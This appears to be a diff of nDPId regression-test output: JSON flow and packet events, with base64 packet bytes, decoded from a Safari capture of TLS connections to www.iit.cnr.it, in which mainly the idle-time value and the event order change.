-00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025281,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025284,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025284,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5392,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898027036,"flow_last_seen":1620898027036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898027036,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5392,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1620898027036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898027036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Etf1AbvGGXtuAAAAALAC\/\/+JoQAAAgQFtAEDAwUBAQgKMzDQVQAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5393,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1620898027065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898027065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71\/XZbafoxhl7b6AS\/ogqVAAAAgQFrAQCCAo6VrYRMzDQVQEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5394,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1620898027065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898027065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Etf1AbvGGXtv2W2n6YAQECxHWQAAAQEICjMw0HE6VrYR"} -00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5395,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898027036,"flow_last_seen":1620898027065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898027065,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5397,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01215{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5399,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2083,"flow_first_seen":1620898024056,"flow_last_seen":1620898029980,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1877633,"flow_avg_l4_payload_len":901,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":801,"flow_first_seen":1620898025216,"flow_last_seen":1620898026198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648336,"flow_avg_l4_payload_len":809,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":621,"flow_first_seen":1620898025216,"flow_last_seen":1620898026065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":509563,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":927,"flow_first_seen":1620898025216,"flow_last_seen":1620898026187,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":807134,"flow_avg_l4_payload_len":870,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":800,"flow_first_seen":1620898025217,"flow_last_seen":1620898026128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":676127,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":769,"flow_first_seen":1620898025217,"flow_last_seen":1620898026109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648144,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1620898027036,"flow_last_seen":1620898027166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898024056,"flow_last_seen":1620898024056,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898024056,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620898024056,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898024056,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfeAbt7aT+8AAAAALAC\/\/8bGAAAAgQFtAEDAwUBAQgKMzDFWAAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620898024084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898024084,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7194MY\/Pce2k\/vaAS\/ohIgwAAAgQFrAQCCAo6VqpvMzDFWAEDAwc="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620898024085,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898024085,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfeAbt7aT+9DGPz3YAQECxliAAAAQEICjMwxXQ6Vqpv"} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898024056,"flow_last_seen":1620898024085,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898024085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfhAbvK+gqhAAAAALAC\/\/\/8IwAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfiAbtAr8myAAAAALAC\/\/\/HXAAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfjAbsjVMkKAAAAALAC\/\/\/lXgAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025217,"flow_last_seen":1620898025217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025217,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620898025217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025217,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfkAbuNFQaeAAAAALAC\/\/8+CAAAAgQFtAEDAwUBAQgKMzDJ1AAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025217,"flow_last_seen":1620898025217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025217,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620898025217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025217,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtflAbtmxM47AAAAALAC\/\/+cugAAAgQFtAEDAwUBAQgKMzDJ1AAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620898025246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025246,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+Mw2y0GI1TJC6AS\/oiwoAAAAgQFrAQCCAo6Vq73MzDJ0wEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620898025246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025246,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfjAbsjVMkLMNstB4AQECzNqAAAAQEICjMwyew6Vq73"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620898025246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025246,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+H+SkNFyvoKoqAS\/ojjtwAAAgQFrAQCCAo6Vq72MzDJ0wEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620898025246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025246,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfhAbvK+gqi\/kpDRoAQECwAwAAAAQEICjMwyew6Vq72"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620898025247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025247,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+RZmQEsjRUGn6AS\/ogMZAAAAgQFrAQCCAo6Vq75MzDJ1AEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620898025247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025247,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfkAbuNFQafWZkBLYAQECwpbAAAAQEICjMwye06Vq75"} 